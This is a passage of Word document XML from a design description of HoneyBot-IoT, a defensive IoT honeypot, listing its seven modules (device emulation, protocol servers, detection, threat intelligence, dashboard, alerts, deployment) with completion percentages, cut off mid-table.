        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This Software Design Description covers the design, implementation and testing of HoneyBot-IoT as delivered in Version 2.1, the 70% milestone (code version v0.7). All five protocols run on all three emulated devices, every interaction lands in one unified event store, malware samples are quarantined and classified with YARA, and a rule-based Threat Intelligence Engine classifies attacks, tags them with MITRE ATT&amp;CK techniques, correlates attackers, exports STIX 2.1 and raises alerts that are pushed live to the dashboard. The table below lists the scope modules and how much of each is complete at this milestone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Covered Modules and Coverage at the 70% Milestone</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067"/>
        <w:gridCol w:w="2562"/>
        <w:gridCol w:w="5731"/>
      </w:tblGrid>
      <w:tr w:rsidR="00240A5B" w:rsidRPr="00240A5B" w14:paraId="025070AB" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="029F077B" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29EEB39B" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5731" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="1F3864"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="456D0472" w14:textId="77777777" w:rsidR="00240A5B" w:rsidRPr="00240A5B" w:rsidRDefault="00240A5B" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w:rsidRPr="00240A5B" w14:paraId="226D8D43" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">M1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">IoT Device Emulation Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5731" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CCTV camera, Smart Lock and Industrial Sensor with realistic vendor banners, a BusyBox-style fake file system and per-device default-credential (vulnerability) profiles; one shared device state across all protocols with live sensor history, alarm thresholds, auto re-lock and a per-device change log. Coverage ≈ 90%.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w:rsidRPr="00240A5B" w14:paraId="226D8D43" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">M2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Multi-Protocol Communication Handler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5731" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Five protocol servers: SSH (Paramiko: shell, exec, stdin and scp upload), Telnet (asyncio, IAC negotiation across TCP reads), HTTP/HTTPS (FastAPI: camera panel, lock REST API, sensor HMI), MQTT 3.1.1 broker and RTSP (RFC 2326, Basic + Digest authentication). Coverage ≈ 92%.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w:rsidRPr="00240A5B" w14:paraId="226D8D43" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">M3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Attack Detection and Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5731" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Unified sessions/events store in PostgreSQL 16 written through one asynchronous writer; command and URL capture; malware samples quarantined read-only with SHA-256, MD5, MIME type and ELF architecture; YARA scanning; GIN full-text search; sixteen time-windowed detection classes. Coverage ≈ 88%.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w:rsidRPr="00240A5B" w14:paraId="226D8D43" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">M4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Threat Intelligence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5731" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cross-session attacker correlation, threat score, offline GeoIP, credential-reuse campaigns, IOC store with idempotent sightings, MITRE ATT&amp;CK (Enterprise + ICS) tagging, STIX 2.1 export and daily/weekly PDF threat reports. Coverage ≈ 88%.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w:rsidRPr="00240A5B" w14:paraId="226D8D43" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">M5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">SOC Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5731" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">React 19 + TypeScript single-page dashboard: overview with offline world map, attackers, detections, devices, session replay, malware, IOCs and MITRE, reports and alerts, search; WebSocket live push; behind Nginx bcrypt basic authentication. Coverage ≈ 92%.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w:rsidRPr="00240A5B" w14:paraId="226D8D43" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">M6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Alert and Notification System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5731" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Telegram Bot API and SMTP e-mail with per-type severity thresholds, 10-minute de-duplication, escalation, MALWARE_FAMILY alerts, PDF report e-mails and a complete alert log. Coverage ≈ 90%.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w:rsidRPr="00240A5B" w14:paraId="226D8D43" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">M7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Infrastructure and Deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5731" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Docker Compose stack of 13 services on four networks; firewall service that blocks all outbound honeynet traffic before the honeypots start; generated bcrypt dashboard password; non-root read-only containers; SHA-256-verified backups; Prometheus/Grafana monitoring profile; schema auto-migration; CI workflow. Coverage ≈ 92%.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00240A5B" w:rsidRPr="00240A5B" w14:paraId="226D8D43" w14:textId="77777777" w:rsidTr="00240A5B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1067" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
